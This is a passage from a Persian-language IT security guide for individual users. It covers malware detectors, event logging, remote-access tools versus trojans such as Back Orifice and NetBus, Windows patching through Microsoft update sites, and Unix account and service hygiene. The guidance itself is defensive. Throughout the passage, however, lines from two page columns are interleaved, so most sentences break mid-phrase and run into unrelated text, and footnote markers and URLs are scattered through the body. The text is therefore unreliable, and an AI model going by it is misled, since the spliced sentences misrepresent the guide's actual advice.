"ﺁﺷﻜﺎﺭﮔﺮﻫﺎﻱ ﺑﺪﺍﻓﺰﺍﺭﻫﺎ" ﺑﺮﻧﺎﻣﻪﻫﺎﻳﻲ ﻫﺴﺘﻨﺪ ﻛـﻪ ﺑـﺮﺍﻱ ﻳـﺎﻓﺘﻦ
ﺷﻤﺎ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻨﺪ.
ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻣﺸﻜﻮﻙ -ﺻـﺮﻓﻨﻈﺮ ﺍﺯ ﭼﮕـﻮﻧﮕﻲ ﻧـﺼﺐ ﺁﻧﻬـﺎ -
ﺭﺍﻳﺎﻧﺔ ﺷﻤﺎ ﺭﺍ ﻣﻮﺭﺩ ﺑﺮﺭﺳﻲ ﻗﺮﺍﺭ ﻣﻲﺩﻫﻨﺪ .ﺑﻌﻀﻲ ﻣﻮﺍﻗﻊ ﻋﻤﻠﻜﺮﺩ ﺍﺑﺰﺍﺭﻫﺎﻱ ﺩﺳﺘﺮﺳﻲ ﺍﺯ ﺭﺍﻩ ﺩﻭﺭ ﻛﺎﺭﺑﺮﺩﻫﺎﻱ ﻣﻬﻢ ﺑﺴﻴﺎﺭﻱ ﺩﺍﺭﻧـﺪ.
ﺁﻧﻬﺎ ﺑﺎ ﺟﺴﺘﺠﻮﮔﺮﻫﺎﻱ ﻭﻳﺮﻭﺱ ﺗﺪﺍﺧﻞ ﺩﺍﺭﺩ ،ﺯﻳﺮﺍ ﻫﺮ ﺩﻭﻱ ﺁﻧﻬـﺎ ﺍﺯ ﻣﻴﺎﻥ ﺁﻧﻬﺎ ﻣﻲﺗﻮﺍﻥ ﺑﻪ ﻣﻮﺍﺭﺩ ﺯﻳﺮ ﺍﺷﺎﺭﻩ ﻛﺮﺩ:
ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻣﺨﺮﺏ ﻣﻮﺟـﻮﺩ ﺩﺭ ﺩﻳـﺴﻚ ﺭﺍ ﺷﻨﺎﺳـﺎﻳﻲ ﻧﻤـﻮﺩﻩ، ﺯﻣﺎﻧﻴﻜﻪ ﺑﻪ ﺭﺍﻳﺎﻧﺔ ﺍﺩﺍﺭﺓ ﺧﻮﺩ ﺩﺳﺘﺮﺳـﻲ ﻓﻴﺰﻳﻜـﻲ ﻧﺪﺍﺭﻳـﺪ •
ﺑﺮﺭﺳﻲ ﻣﻲﻛﻨﻨـﺪ ﻛـﻪ ﺑﺮﻧﺎﻣـﻪﻫـﺎﻱ ﻛﻠﻴـﺪﻱ ﺳﻴـﺴﺘﻢ ﺑـﺼﻮﺭﺕ ﺍﻳﻦ ﺍﻣﻜﺎﻥ ﺭﺍ ﻓﺮﺍﻫﻢ ﻣﻲﻛﻨﻨﺪ ﻛﻪ ﺍﺯ ﺁﻥ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﺎﻳﻴـﺪ.
ﻣﺨﻔﻴﺎﻧﻪ ﺗﻐﻴﻴﺮ ﻧﻜﺮﺩﻩ ﺑﺎﺷﻨﺪ. ﺑﺎ ﺍﻳﻨﻜﺎﺭ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺑﻪ ﺩﺍﺩﻩﻫﺎ ،ﺑﺮﻧﺎﻣـﻪﻫـﺎﻱ ﻛـﺎﺭﺑﺮﺩﻱ ﻭ
ﺍﻳﻦ ﺁﺷـﻜﺎﺭﮔﺮﻫﺎ plug-inﻫـﺎ ﻭ add-onﻫـﺎﻱ ﻣﺮﻭﺭﮔﺮﻫـﺎ ﺭﺍ ﺧﺪﻣﺎﺕ ﺷﺒﻜﻪﺍﻱ ﻣﺤﻞ ﻛﺎﺭﺗﺎﻥ ﺩﺳﺘﺮﺳﻲ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ.
ﺑﺮﺭﺳﻲ ﻣﻲﻛﻨﻨﺪ ﻭ ﻫﺮﺁﻧﭽﻪ ﻛﻪ ﺑﻪ ﺳﻴﺴﺘﻢ ﺷﻤﺎ ﺁﺳﻴﺐ ﻣﻲﺭﺳﺎﻧﺪ ﺍﺟﺎﺯﻩ ﻣﻲ ﺩﻫﻨﺪ ﺭﺍﻳﺎﻧـﺔ ﺧـﻮﺩ ﺭﺍ ﺑـﺮﺍﻱ ﻣﻌﺎﻳﻨـﻪ ﺑـﻪ ﻳـﻚ •
ﻭ ﻳﺎ ﺑﺮﺧﻼﻑ ﻗﻮﺍﻧﻴﻦ ﻣﺤﺮﻣﺎﻧﮕﻲ ﺍﺳﺖ ﺭﺍ ﺷﻨﺎﺳﺎﻳﻲ ﻣـﻲﻧﻤﺎﻳﻨـﺪ. ﻣﺘﺨﺼﺺ ﻧﺸﺎﻥ ﺩﻫﻴﺪ؛ ﺑﺪﻭﻥ ﺁﻧﻜﻪ ﻭﻱ ﺭﺍ ﺑﻪ ﻣﺤﻞ ﻛـﺎﺭ
ﺑﺮﺧﻲ ﺍﺯ ﺍﻳﻦ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎ ﺩﺍﺭﺍﻱ ﺍﺑﺰﺍﺭﻫﺎﻳﻲ ﺑـﺮﺍﻱ ﺍﺯ ﺑـﻴﻦ ﺑـﺮﺩﻥ ﺧﻮﺩ ﺑﺒﺮﻳﺪ.
ﺑﺪﺍﻓﺰﺍﺭﻫﺎﻱ ﺷﻨﺎﺳﺎﻳﻲﺷﺪﻩ ﻧﻴﺰ ﻫﺴﺘﻨﺪ.
ﺍﻓﺮﺍﺩ ﺯﻳﺎﺩﻱ ﺧﻮﺍﻫﻨﺪ ﺗﻮﺍﻧﺴﺖ ﺍﺯ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻛﺎﺭﺑﺮﺩﻱ ﻛﻪ •
ﺗﻨﻬﺎ ﺑﺮ ﺭﻭﻱ ﻳﻚ ﺩﺳﺘﮕﺎﻩ ﻧﺼﺐ ﺷﺪﻩ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻨﺪ.
ﺛﺒﺖ ﺭﺧﺪﺍﺩﻫﺎ
ﻣﺴﺌﻮﻟﻴﻦ ﭘﺸﺘﻴﺒﺎﻧﻲ ﺳﻴﺴﺘﻤﻬﺎ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺁﻧﻬﺎ ﻣﻲﺗﻮﺍﻧﻨﺪ •
ﻓﺎﻳﻠﻬﺎﻱ ﺛﺒﺖ ﺭﺧﺪﺍﺩﻫﺎ ﺍﺑﺰﺍﺭ ﻣﻨﺎﺳﺒﻲ ﻫﺴﺘﻨﺪ ﻛـﻪ ﺍﻣﻨﻴـﺖ ﺭﺍﻳﺎﻧـﺔ
ﭼﻨﺪﻳﻦ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﺭﺍ ﺑﻪ ﺁﺳﺎﻧﻲ ﻣﺪﻳﺮﻳﺖ ﻧﻤﺎﻳﻨﺪ.
ﻻ ﺯﻳـﺎﺩ ﻣـﻮﺭﺩ ﺗﻮﺟـﻪ ﻗـﺮﺍﺭ ﺷﻤﺎ ﺭﺍ ﺗﻀﻤﻴﻦ ﻣﻲﻛﻨﻨﺪ ﺍﻣـﺎ ﻣﻌﻤـﻮ ﹰ
ﻧﻤﻲﮔﻴﺮﻧﺪ .ﻓﺎﻳﻠﻬﺎﻱ ﺛﺒﺖ ﺭﻭﻱ ﺩﻳﺴﻚ ﻗﺮﺍﺭ ﺩﺍﺭﻧـﺪ ﻭ ﺑﺮﻧﺎﻣـﻪﻫـﺎ ﺍﺑﺰﺍﺭﻫﺎﻱ ﺩﺳﺘﺮﺳﻲ ﺍﺯ ﺭﺍﻩ ﺩﻭﺭ ﺍﻳﻦ ﺍﻣﻜﺎﻥ ﺭﺍ ﺑﺮﺍﻱ ﻣﻬﺎﺟﻤﻴﻦ ﻧﻴﺰ
ﻻ ﭘﻴـﺎﻡ ﻫﻨﮕـﺎﻣﻲ ﻧﻮﺷـﺘﻪ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺩﺭ ﺁﻥ ﭘﻴﺎﻡ ﺑﻨﻮﻳﺴﻨﺪ .ﻣﻌﻤـﻮ ﹰ ﻓﺮﺍﻫﻢ ﻣﻲﻛﻨﻨﺪ ﻛﻪ ﺑﺘﻮﺍﻧﻨﺪ ﺗﻤـﺎﻣﻲ ﻣـﻮﺍﺭﺩ ﺫﻛـﺮ ﺷـﺪﻩ ﺭﺍ ﺍﻧﺠـﺎﻡ
ﻣﻲﺷﻮﺩ ﻛﻪ ﻳﻚ ﺍﺗﻔﺎﻕ ﺭﺥ ﻣﻲﺩﻫﺪ ﻳﺎ ﺍﺷﻜﺎﻟﻲ ﺑﻮﺟﻮﺩ ﻣﻲﺁﻳﺪ. ﺩﻫﻨــﺪ .ﺩﺭ ﺣﻘﻴﻘــﺖ ﻣﻴــﺎﻥ ﺍﺑﺰﺍﺭﻫــﺎﻱ ﺩﺳﺘﺮﺳــﻲ ﺍﺯ ﺭﺍﻩ ﺩﻭﺭ ﺩﺭ
ﻛﺎﺭﺑﺮﺩﻫــﺎﻱ ﻣــﺬﻛﻮﺭ )ﻣﺎﻧﻨــﺪ (pcAnywhereﻭ ﺩﺭﺑﻬــﺎﻱ ﻣﺨﻔــﻲ
ﻗﺎﻧﻮﻥ ﺑﻴﺴﺖ ﻭ ﭘﻨﺠﻢ: ﺗﺮﺍﻭﺍﻫﺎ )ﻣﺜﻞ Back Orificeﻳﺎ (NetBusﺗﻔﺎﻭﺕ ﻋﻤﻠﻜﺮﺩ ﭼﻨـﺪﺍﻧﻲ
ﻗﺎﺑﻠﻴﺖ ﺛﺒﺖ ﺭﺧﺪﺍﺩﻫﺎﻱ ﺗﻮﺍﺑﻊ ﺳﻴﺴﺘﻢ ﻭ ﺑﺮﻧﺎﻣﻪ ﻫﺎﻱ ﻭﺟﻮﺩ ﻧﺪﺍﺭﺩ.
ﻛﺎﺭﺑﺮﺩﻱ ﺑﺎﻳﺪ ﺑﺼﻮﺭﺕ ﺻﺤﻴﺢ ﻓﻌﺎﻝ ﺑﺎﺷﻨﺪ.
ﺁﺷﻜﺎﺭﮔﺮﻫﺎﻱ ﺑﺪﺍﻓﺰﺍﺭﻫﺎ
ﻧﻤﻮﻧﻪﻫﺎﻳﻲ ﺍﺯ ﻭﻗﺎﻳﻌﻲ ﻛﻪ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺛﺒﺖ ﺷﻮﻧﺪ ﻋﺒﺎﺭﺗﻨﺪ ﺍﺯ:
ﻓﺮﺽ ﻛﻨﻴﻢ ﺷﻤﺎ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺧﻮﺩ ﺭﺍ ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ﻣﻲﻛﻨﻴﺪ ،ﻭﻳﺮﻭﺱ
ﺭﺍﻳﺎﻧﻪ ﺭﻭﺷﻦ ﺷﺪ؛ •
ﻭ ﻓﺎﻳﻠﻬﺎﻱ ﺩﺭﻳﺎﻓﺘﻲ ﺭﺍ ﻣﻮﺭﺩ ﺑﺮﺭﺳﻲ ﻗﺮﺍﺭ ﻣـﻲﺩﻫﻴـﺪ ،ﺍﺯ ﻧﺎﻣﻬـﺎﻱ
ﺷﺨﺼﻲ ﻭﺍﺭﺩ ﺳﻴﺴﺘﻢ ﺷﺪ؛ • ﻛﺎﺭﺑﺮﻱ ﻭ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﻣﺴﺘﺤﻜﻢ ﺍﺳﺘﻔﺎﺩﻩ ﻣـﻲﻧﻤﺎﻳﻴـﺪ ﻭ ﻳـﻚ
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ٩٨
ﺷﺨﺼﻲ ﺳﻌﻲ ﺩﺍﺷﺖ ﻭﺍﺭﺩ ﺳﻴﺴﺘﻢ ﺷﻮﺩ ﺍﻣـﺎ ﺭﻣـﺰ ﻋﺒـﻮﺭ •
ﻭﻱ ﺍﺷﺘﺒﺎﻩ ﺑﻮﺩ؛
ﻳﻚ ﻧﺎﻣﺔ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺩﺭﻳﺎﻓﺖ ﺷﺪ؛ •
ﻛﻨﺎﺭ ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎﻱ ﻣﺬﻛﻮﺭ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﺩ ﺳﻴـﺴﺘﻤﻬﺎﻱ ﻣﺒﺘﻨـﻲ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺷﺨﺼﻲ ﻣﺒﺘﻨﻲ ﺑﺮ Windows
ﺑﺮ Windowsﺭﺍ ﻣﺴﺘﻌﺪ ﺑﺮﻭﺯ ﻣﺸﻜﻼﺕ ﺍﻣﻨﻴﺘﻲ ﻣﻲﻛﻨﺪ.
ﻧﻘﺎﻁ ﻗﻮﺕ ﻭ ﻧﻘﺎﻁ ﺿﻌﻒ
ﭼﮕﻮﻧﻪ ﺍﺯ ﺧﻮﺩ ﻣﺤﺎﻓﻈﺖ ﻛﻨﻴﻢ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ Windowsﭘﺮﺩﺍﺯﻧـﺪﺓ ) Intel x86ﻳـﺎ ﻣﻌﺎﺩﻟﻬـﺎﻱ
ﺗﻤﺎﻣﻲ ﻣﻄﺎﻟﺐ ﺍﻳﻦ ﻛﺘﺎﺏ ﺑﺮﺍﻱ ﺳﻴﺴﺘﻤﻬﺎﻱ Windowsﻗﺎﺑﻞ ﺁﻥ( ﺭﺍﻳﺠﺘﺮﻳﻦ ﺳﻴﺴﺘﻢ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺍﺳﺖ ﻛﻪ ﺗﺎﻛﻨﻮﻥ ﻃﺮﺍﺣﻲ ﺷـﺪﻩ
ﺍﻋﻤﺎﻝ ﺍﺳﺖ ﻭ ﻛﺎﺭﺑﺮﺍﻧﻲ ﻛﻪ ﻧﮕﺮﺍﻥ ﻣﺴﺎﺋﻞ ﺍﻣﻨﻴﺘﻲ ﻫـﺴﺘﻨﺪ ﺑﺎﻳـﺪ ﺍﺳﺖ .ﻗﺎﺑﻠﻴﺘﻬﺎﻱ ﺍﻳﻦ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﻭ ﻧﺮﻡ ﺍﻓﺰﺍﺭﻫﺎﻱ ﻛﺎﺭﺑﺮﺩﻱ ﺁﻥ
ﺗﻤﺎﻡ ﺗﻮﺻﻴﻪﻫﺎﻱ ﺍﺭﺍﺋﻪﺷﺪﻩ ﺭﺍ ﺟﺪﻱ ﺑﮕﻴﺮﻧﺪ. ﺍﺯ ﺩﻳﺪﮔﺎﻩ ﻳﻚ ﻛـﺎﺭﺑﺮ ﺑـﺴﻴﺎﺭ ﺟـﺬﺍﺏ ﻫـﺴﺘﻨﺪ ﻭ ﺗﻌـﺪﺍﺩ ﺯﻳـﺎﺩﻱ
ﻧﺮﻡﺍﻓﺰﺍﺭ ﺗﺠﺎﺭﻱ ،ﻧﺮﻡﺍﻓﺰﺍﺭ sharewareﻭ ﻧـﺮﻡﺍﻓـﺰﺍﺭ ﺭﺍﻳﮕـﺎﻥ
ﺍﻧﺘﺸﺎﺭ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺑﺮﺍﻱ ﺁﻥ ﻣﻮﺟﻮﺩ ﺍﺳﺖ .ﺍﮔﺮﭼﻪ ﻣﺸﺎﺑﻪ ﻫﺮ ﺳﻴﺴﺘﻢ ﺩﻳﮕﺮ ﺩﺭ ﺍﻳﻨﺠﺎ
ﺍﮔﺮ ﭘﻬﻨﺎﻱ ﺑﺎﻧﺪ ﻛﺎﻓﻲ ﺩﺍﺭﻳـﺪ ،ﺑـﺮﺍﻱ ﺑـﻪﺭﻭﺯ ﻧﮕـﻪﺩﺍﺷـﺘﻦ ﻫﻢ ﺍﻓﺮﺍﺩ ﻣﺘﺨﺼﺺ ﺑﻪ ﺳﺨﺘﻲ ﭘﻴﺪﺍ ﻣﻲﺷﻮﻧﺪ ،ﺍﻣـﺎ ﻣﺘﺨﺼـﺼﻴﻦ
ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﺧﻮﺩ ﺑﺎ ﺁﺧﺮﻳﻦ ﻧﺴﺨﺔ ServicePackﻫـﺎ ﺯﻳﺎﺩﻱ ﺑﺎ ﺳﻄﺢ ﺩﺍﻧﺶ ﻗﺎﺑﻞ ﻗﺒﻮﻝ ﺑﺮﺍﻱ ﻛﺎﺭ ﺑـﺎ ﺍﻳـﻦ ﺳﻴـﺴﺘﻤﻬﺎ
ﺍﺯ ﭘﺎﻳﮕﺎﻩ ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ﻣﺎﻳﻜﺮﻭﺳﺎﻓﺖ ١١٨ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴـﺪ .ﺩﺭ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ .ﻫﻤﭽﻨﻴﻦ ﺭﻗﺒﺎﻱ ﺯﻳﺎﺩﻱ ﺩﺭ ﺑﻌﺪ ﺳﺨﺖﺍﻓﺰﺍﺭ ﺑـﺎ ﻫـﻢ
ﻏﻴﺮﺍﻳﻨــﺼﻮﺭﺕ ﻭﺻــﻠﻪﻫــﺎﻱ ﺍﻣﻨﻴﺘــﻲ ﻣﻨﺘــﺸﺮﺷﺪﻩ ﺑــﺮﺍﻱ ﺭﻗﺎﺑﺖ ﻣـﻲﻛﻨﻨـﺪ ﻛـﻪ ﺍﻳـﻦ ﺧـﻮﺩ ﺑﺎﻋـﺚ ﺗﻨـﻮﻉ ﻣﺤـﺼﻮﻻﺕ ﻭ
ﺑﻪ ﺭﻭﺯﺭﺳﺎﻧﻲ Windowsﺭﺍ ﺑﻜﺎﺭ ﺑﮕﻴﺮﻳﺪ )ﺍﻳـﻦ ﻭﺻـﻠﻪﻫـﺎ ﻗﻴﻤﺘﻬﺎﻱ ﻧﺴﺒﺘﹰﺎ ﭘﺎﻳﻴﻦ ﺁﻧﻬﺎ ﺷﺪﻩ ﺍﺳﺖ.
ﻧﺴﺒﺖ ﺑﻪ Service Packﻫﺎ ﭘﻬﻨﺎﻱ ﺑﺎﻧﺪ ﻛﻤﺘﺮﻱ ﺍﺷﻐﺎﻝ ﻣﻲﻛﻨﻨﺪ(. Windowsﺍﺯ ﻧﻈﺮ ﺍﻣﻨﻴﺘـﻲ ﻭﺿـﻌﻴﺖ ﭼﻨـﺪﺍﻥ ﺟـﺎﻟﺒﻲ ﻧـﺪﺍﺭﺩ.
ﺍﮔــﺮ ﺑــﻪﺭﻭﺯﺭﺳــﺎﻧﻲ ﺍﺯ ﻃﺮﻳــﻖ ﭘﺎﻳﮕــﺎﻩ ﺑــﻪﺭﻭﺯﺭﺳــﺎﻧﻲ ﻫﺴﺘﺔ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ١١٧ﺑﺎ ﻣﻼﺣﻈـﺔ ﻣـﺴﺎﺋﻞ ﺍﻣﻨﻴﺘـﻲ ﺍﺭﺗﺒﺎﻃـﺎﺕ
ﻣﺎﻳﻜﺮﻭﺳــﺎﻓﺖ ﺑﺮﺍﻳﺘــﺎﻥ ﺍﻣﻜﺎﻧﭙــﺬﻳﺮ ﻧﻴــﺴﺖ ﻣــﻲﺗﻮﺍﻧﻴــﺪ ﺷﺒﻜﻪﺍﻱ ﻃﺮﺍﺣﻲ ﻧﺸﺪﻩ ﺑﻮﺩ ﻭ ﻫﺮﭼﻨﺪ ﺩﺭ ﻧﺴﺨﻪﻫﺎﻱ ﺟﺪﻳﺪﺗﺮ ﺁﻥ
ﺑــﺴﺘﻪﻫــﺎﻱ ﺑــﻪﺭﻭﺯﺭﺳــﺎﻧﻲ ﺭﺍ ﺍﺯ ﻣﺮﻛــﺰ download ) Windows 2000ﻭ Windows XPﻭ (...ﺑﻪ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺍﻳﻦ ﻣﻮﺍﺭﺩ
ﻣﺎﻳﻜﺮﻭﺳﺎﻓﺖ ١١٩ﺩﺭﻳﺎﻓﺖ ﻛﻨﻴﺪ. ﭘﺮﺩﺍﺧﺘﻪ ﺷﺪﻩ ،ﺍﻣﺎ ﻫﻨﻮﺯ ﺍﻳﻤﻨﻲ ﻻﺯﻡ ﻭﺟﻮﺩ ﻧﺪﺍﺭﺩ ﻭ ﺗﻐﻴﻴﺮﺍﺕ ﺍﺧﻴﺮ
ﺷﺎﻳﺪ ISPﺷﻤﺎ ﻳﺎ ﺳﺎﻳﺮ ﻓﺮﺍﻫﻢﺁﻭﺭﻧﺪﮔﺎﻥ ﺧﺪﻣﺎﺕ ﺑﺘﻮﺍﻧﻨـﺪ ﺑﻪ ﻛﺎﺭﺑﺮﺍﻧﻲ ﻛﻪ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻗﺪﻳﻤﻲﺗـﺮ ﺍﺳـﺘﻔﺎﺩﻩ ﻣـﻲﻛﺮﺩﻧـﺪ
ﺑﻪﺭﻭﺯﺭﺳـﺎﻧﻲﻫـﺎﻱ ﻣﻨﺘـﺸﺮﺷﺪﻩ ﺭﺍ downloadﻭ ﺭﻭﻱ ﻛﻤﻚ ﺍﻧﺪﻛﻲ ﻧﻤﻮﺩﻩ ﺍﺳﺖ .ﺗﺎ ﻫﻤﻴﻦ ﺍﻭﺍﺧﺮ ﻣﺎﻳﻜﺮﻭﺳـﺎﻓﺖ ﺗﻮﺟـﻪ
ﺩﻳﺴﻚ ﻓﺸﺮﺩﻩ ﺗﻮﺯﻳﻊ ﻛﻨﻨﺪ .ﺍﮔﺮﭼﻪ ﻣﻨـﺎﺑﻊ ﻗﺎﺑـﻞﺗـﻮﺟﻬﻲ ﺯﻳﺎﺩﻱ ﺑﻪ ﻣﻘﻮﻟﺔ ﺍﻣﻨﻴﺖ ﻧﺪﺍﺷﺖ .ﺍﻟﺒﺘﻪ ﺩﺭﺣﺎﻝ ﺣﺎﺿﺮ ﺍﻳﻦ ﺷـﺮﺍﻳﻂ
ﺑﺮﺍﻱ ﺍﻳﻨﻜﺎﺭ ﻣﻮﺭﺩ ﻧﻴﺎﺯ ﺍﺳﺖ ،ﺍﻣﺎ ﻳﻚ ﺍﺑﺰﺍﺭ ﺑﺮﺍﻱ ﻣﺪﻳﺮﻳﺖ ﺗﻐﻴﻴﺮ ﻛﺮﺩﻩﺍﻧـﺪ ،ﺑـﻮﻳﮋﻩ ﺁﻧﻜـﻪ ﺍﻳـﻦ ﺷـﺮﻛﺖ ﺗﻮﺟـﻪ ﺧـﻮﺩ ﺭﺍ ﺑـﻪ
ﺑﻪ ﺭﻭﺯﺭﺳـﺎﻧﻲ Windowsﺩﺭ ﻗﺎﻟـﺐ ﺧـﺪﻣﺎﺗﻲ ﺑـﻪ ﻧـﺎﻡ ﺍﺷــﻜﺎﻻﺕ ﻣﻮﺟــﻮﺩ ﺩﺭ ﻧــﺮﻡﺍﻓﺰﺍﺭﻫــﺎﻱ ﭼﻨﺪﺭﺳــﺎﻧﻪﺍﻱ ﻭ ﺩﻳﮕــﺮ
Software Update Servicesﺑﺮﺍﻱ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎﻱ ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬﺎﻱ ﺧﻮﺩ ﻣﻌﻄﻮﻑ ﺩﺍﺷﺘﻪ ﺍﺳﺖ.
Windows 2000ﺩﺭ ﭘﺎﻳﮕــﺎﻩ ﺯﻳــﺮ ﻗﺎﺑــﻞ ﺩﺳﺘﺮﺳــﻲ ﻻ ﺑﺎﻋﺚ ﺑـﺎﻻﻋﻤﻠﻜﺮﺩ ﺗﻮﺳﻌﻪﻳﺎﻓﺘﺔ ﺳﻴﺴﺘﻤﻬﺎ ﻭ ﻧﺮﻡ ﺍﻓﺰﺍﺭﻫﺎ ﻣﻌﻤﻮ ﹰ
ﺍﺳﺖ: ﺭﻓﺘﻦ ﻫﺰﻳﻨﺔ ﺍﻳﻤﻦﺳﺎﺯﻱ ﺁﻧﻬﺎ ﻣﻲﺷﻮﺩ .ﺩﺭ ﺑﺴﻴﺎﺭﻱ ﻣﻮﺍﺭﺩ ﺑﻤﻨﻈﻮﺭ
ﺁﺳﺎﻥ ﻛﺮﺩﻥ ﺍﺳﺘﻔﺎﺩﺓ ﻛﺎﺭﺑﺮﺍﻥ ﺗﺎﺯﻩﻛﺎﺭ ﺍﺯ ﺍﺑﺰﺍﺭ ،ﺳﻴـﺴﺘﻤﻬﺎ ﺩﺍﺭﺍﻱ
118 http://windowsupdate.microsoft.com
119 http://www.microsoft.com/downloads 117 O.S. Kernel
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ١٠٠
120 Multi-User
122 System Services 121 File System
١٠١ ﺑﺨﺶ ﺩﻭﻡ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﮐﺎﺭﺑﺮﺍﻥ ﻣﻨﻔﺮﺩ
124 Workstation
126 Pre-Installed Security Mechanisms 125 Single-User
١٠٣ ﺑﺨﺶ ﺩﻭﻡ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﮐﺎﺭﺑﺮﺍﻥ ﻣﻨﻔﺮﺩ
ﺑﻌﻀﻲ ﻣﺮﺩﻡ ﺗﺼﻮﺭ ﻣﻲﻛﻨﻨﺪ ﭼـﻮﻥ ﺍﻳـﻦ ﺧـﺪﻣﺎﺕ ﻭﺟـﻮﺩ ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﺭﻭﺯﻣـﺮﻩ ﺧـﻮﺩﺩﺍﺭﻱ ﻛﻨﻴـﺪ ﻭ ﺑـﺮﺍﻱ ﺍﻃﻤﻴﻨـﺎﻥ
ﺩﺍﺭﻧﺪ ﺑﺎﻳﺪ ﺍﺯ ﺁﻧﻬﺎ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤـﻮﺩ -ﺣﺘـﻲ ﺍﮔـﺮ ﺗﺨـﺼﺺ ﺑﻴﺸﺘﺮ ﺍﻣﻜﺎﻥ ﻭﺭﻭﺩ ﺑﻪ ﺳﻴﺴﺘﻢ ﺭﺍ ﺑـﺎ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﺣـﺴﺎﺏ
ﻓﻨﻲ ﺑﺮﺍﻱ ﻣﺪﻳﺮﻳﺖ ﺍﻣﻨﻴﺖ ﺁﻧﺮﺍ ﻧﺪﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ .ﺍﻳﻦ ﺍﺷﺘﺒﺎﻩ ﻛﺎﺭﺑﺮﻱ ﺭﻳﺸﻪ ﻏﻴﺮﻓﻌﺎﻝ ﺳﺎﺯﻳﺪ .ﻫﻨﮕﺎﻣﻴﻜـﻪ ﺑﺎﻳـﺪ ﺍﺯ ﺍﻳـﻦ
ﺑﺰﺭﮔﻲ ﺍﺳﺖ ﻭ ﺍﻳﻦ ﺧﺪﻣﺎﺕ ﻧﺒﺎﻳﺪ ﺑﺪﻭﻥ ﺩﻟﻴﻞ ﻗﺎﻧﻊﻛﻨﻨـﺪﻩ ﺣﺴﺎﺏ ﻛﺎﺭﺑﺮﻱ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴـﺪ ﺍﺯ ﺩﺳـﺘﻮﺭ superuser
ﻭ ﭘﺸﺘﻴﺒﺎﻧﻲ ﻓﻨﻲ ﻛﺎﻓﻲ ﺩﺭ ﺍﻳﺴﺘﮕﺎﻫﻬﺎﻱ ﻛـﺎﺭﻱ ﻛـﺎﺭﺑﺮﺍﻥ ) suﻳﺎ ﻧﻤﻮﻧﻪﻫﺎﻱ ﺩﻳﮕﺮ ﻣﺎﻧﻨﺪ (sudoﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ ﺗﺎ ﺣـﺴﺎﺏ
ﺭﺍﻩﺍﻧﺪﺍﺯﻱ ﺷﺪﻩ ﺑﺎﺷﻨﺪ. ﻛﺎﺭﺑﺮﻱ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﺭﺍ ﺑﻪ ﺣﺴﺎﺏ ﻛﺎﺭﺑﺮﻱ ﺭﻳﺸﻪ ﺗﺒﺪﻳﻞ
ﻧﻤﺎﻳﻴﺪ.
ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺧﺪﻣﺎﺕ ﺷﺒﻜﻪﺍﻱ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻓﺮﻣﺎﻥ inetd
ﻳــﺎ xinetdﺷــﺮﻭﻉ ﺑــﻪ ﻓﻌﺎﻟﻴــﺖ ﻣــﻲﻛﻨﻨــﺪ .ﻓﺎﻳﻠﻬــﺎﻱ ﺍﮔﺮ ﺭﻭﻱ ﺳﻴﺴﺘﻢ ﺑﻴﺶ ﺍﺯ ﻳﻚ ﻛﺎﺭﺑﺮ ﺩﺍﺭﻳﺪ ﺍﺯ ﻓﻬﺮﺳﺘﻬﺎﻱ
